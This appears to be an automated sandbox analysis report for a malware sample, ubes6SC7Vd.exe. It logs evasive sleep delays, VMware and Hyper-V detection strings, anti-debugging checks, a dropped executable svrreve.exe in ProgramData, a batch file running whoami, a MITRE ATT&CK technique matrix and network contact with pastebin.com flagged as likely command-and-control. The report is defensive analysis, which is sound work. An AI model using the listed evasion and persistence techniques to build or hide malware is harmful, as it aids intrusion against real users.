Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -597110s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -596985s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -596860s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -596735s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -596610s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -596485s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -596360s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -596172s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -596054s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -595918s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -595812s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -595704s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -595579s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -595454s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -595329s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -595219s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -595094s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -594985s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -594860s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -594735s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -594610s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -594485s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -594360s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -594235s >= -30000s
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312; Thread sleep time: -594061s >= -30000s
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe TID: 7312Thread sleep time: -593954s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep count: 32 > 30Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -599875s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7828Thread sleep count: 7302 > 30Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7828Thread sleep count: 2539 > 30Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -599765s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -599656s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -599547s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -599437s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -599328s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -599219s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -599094s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598984s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598875s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598766s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598656s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598547s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598438s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598313s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598188s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -598067s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -597942s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -597789s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -597684s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -597547s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -597390s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -597281s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -597172s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -597062s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596953s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596844s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596734s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596625s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596516s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596406s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596297s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596187s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -596078s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595969s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595859s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595750s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595641s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595531s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595422s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595313s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595203s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -595090s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -594977s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -594787s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -594625s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -594511s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -594406s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -594297s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -594187s >= -30000sJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exe TID: 7608Thread sleep time: -594078s >= -30000sJump to behavior
                          Source: C:\Windows\System32\timeout.exe TID: 7624Thread sleep count: 51 > 30Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599891Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599781Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599672Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599562Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599445Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599342Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599235Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 599085Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598914Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598809Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598702Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598594Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598469Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598360Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598235Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 598110Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597985Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597860Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597735Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597610Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597485Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597360Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597235Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 597110Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596985Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596860Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596735Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596610Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596485Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596360Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596172Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 596054Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595918Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595812Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595704Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595579Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595454Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595329Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595219Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 595094Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594985Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594860Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594735Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594610Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594485Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594360Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594235Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 594061Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeThread delayed: delay time: 593954Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599765Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599656Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599547Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599437Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599328Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599219Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 599094Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598984Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598875Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598766Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598656Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598547Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598438Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598313Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598188Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 598067Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597942Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597789Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597684Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597547Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597390Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597281Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597172Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 597062Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596953Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596844Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596734Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596625Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596516Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596406Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596297Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596187Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 596078Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595969Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595859Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595750Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595641Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595531Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595422Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595313Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595203Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 595090Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594977Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594787Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594625Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594511Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594406Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594297Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594187Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeThread delayed: delay time: 594078Jump to behavior
                          Source: ubes6SC7Vd.exe, svrreve.exe.0.drBinary or memory string: Hyper-V
                          Source: Amcache.hve.17.drBinary or memory string: VMware
                          Source: Amcache.hve.17.drBinary or memory string: VMware Virtual USB Mouse
                          Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin
                          Source: Amcache.hve.17.drBinary or memory string: VMware, Inc.
                          Source: Amcache.hve.17.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.17.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.17.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.17.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.17.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.17.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: Amcache.hve.17.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.17.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: ubes6SC7Vd.exe, 00000000.00000002.1859462067.00000258F2C9C000.00000004.00000020.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2291618512.0000026DD9570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: Amcache.hve.17.drBinary or memory string: vmci.sys
                          Source: Amcache.hve.17.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                          Source: ubes6SC7Vd.exe, 00000000.00000002.1859941391.00000258F5105000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin`
                          Source: Amcache.hve.17.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.17.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.17.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.17.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.17.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: Amcache.hve.17.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: Amcache.hve.17.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.17.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: Amcache.hve.17.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.17.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.17.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: ubes6SC7Vd.exe, 00000000.00000002.1859941391.00000258F5105000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\_l
                          Source: Amcache.hve.17.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: C:\ProgramData\uovan\svrreve.exe; Process information queried: ProcessInformation

                          Anti Debugging

                          Source: C:\ProgramData\uovan\svrreve.exe; Code function: 2_2_00007FFD9BA11312 CheckRemoteDebuggerPresent, 2_2_00007FFD9BA11312
                          Source: C:\ProgramData\uovan\svrreve.exe; Process queried: DebugPort
                          Source: C:\ProgramData\uovan\svrreve.exe; Process queried: DebugPort
                          Source: C:\ProgramData\uovan\svrreve.exe; Process queried: DebugPort
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Process token adjusted: Debug
                          Source: C:\ProgramData\uovan\svrreve.exe; Process token adjusted: Debug
                          Source: C:\Windows\System32\whoami.exe; Process token adjusted: Debug
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Memory allocated: page read and write | page guard
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Process created: C:\ProgramData\uovan\svrreve.exe "C:\ProgramData\uovan\svrreve.exe"
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD97.tmp.bat""
                          Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\timeout.exe timeout 7
                          Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\whoami.exe whoami
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Queries volume information: C:\Users\user\Desktop\ubes6SC7Vd.exe VolumeInformation
                          Source: C:\ProgramData\uovan\svrreve.exe; Queries volume information: C:\ProgramData\uovan\svrreve.exe VolumeInformation
                          Source: C:\Windows\System32\cmd.exe; Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\cmd.exe; Queries volume information: C:\ VolumeInformation
                          Source: C:\ProgramData\uovan\svrreve.exe; Queries volume information: C:\ProgramData\uovan\svrreve.exe VolumeInformation
                          Source: C:\ProgramData\uovan\svrreve.exe; Queries volume information: C:\ProgramData\uovan\svrreve.exe VolumeInformation
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: Amcache.hve.17.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.17.dr; Binary or memory string: msmpeng.exe
                          Source: Amcache.hve.17.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: Amcache.hve.17.dr; Binary or memory string: MsMpEng.exe
                          MITRE ATT&CK matrix (tactic columns): Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact
                          Gather Victim Identity Information1
                          Scripting
                          Valid Accounts2
                          Command and Scripting Interpreter
                          1
                          Scripting
                          11
                          Process Injection
                          1
                          Masquerading
                          OS Credential Dumping221
                          Security Software Discovery
                          Remote Services1
                          Archive Collected Data
                          1
                          Web Service
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/Job1
                          Registry Run Keys / Startup Folder
                          1
                          Registry Run Keys / Startup Folder
                          1
                          Disable or Modify Tools
                          LSASS Memory1
                          Process Discovery
                          Remote Desktop ProtocolData from Removable Media11
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          41
                          Virtualization/Sandbox Evasion
                          Security Account Manager41
                          Virtualization/Sandbox Evasion
                          SMB/Windows Admin SharesData from Network Shared Drive1
                          Ingress Tool Transfer
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                          Process Injection
                          NTDS1
                          Application Window Discovery
                          Distributed Component Object ModelInput Capture3
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                          Obfuscated Files or Information
                          LSA Secrets1
                          File and Directory Discovery
                          SSHKeylogging4
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          Software Packing
                          Cached Domain Credentials113
                          System Information Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Timestomp
                          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          DLL Side-Loading
                          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Behavior Graph (ID: 1462351, Sample: ubes6SC7Vd.exe, Startdate: 25/06/2024, Architecture: WINDOWS, Score: 100)
• Start node: DNS/IP pastebin.com, ipwhois.app; signatures: Antivirus / Scanner detection for submitted sample, Multi AV Scanner detection for submitted file, .NET source code contains potential unpacker, 4 other signatures; pastebin.com: Connects to a pastebin service (likely for C&C)
• Started from the start node: ubes6SC7Vd.exe (graph counters 14, 9), svrreve.exe, svrreve.exe
• ubes6SC7Vd.exe: ipwhois.app 195.201.57.90, 443, 49731, 49732 (HETZNER-ASDE Germany); dropped C:\ProgramData\uovan\svrreve.exe (PE32), C:\Users\user\AppData\...\ubes6SC7Vd.exe.log (CSV), C:\...\svrreve.exe:Zone.Identifier (ASCII); started svrreve.exe (graph counters 15, 2) and cmd.exe (graph counter 1)
• svrreve.exe (first instance started from the start node): started WerFault.exe (graph counter 21)
• svrreve.exe (second instance started from the start node): started WerFault.exe (graph counter 21)
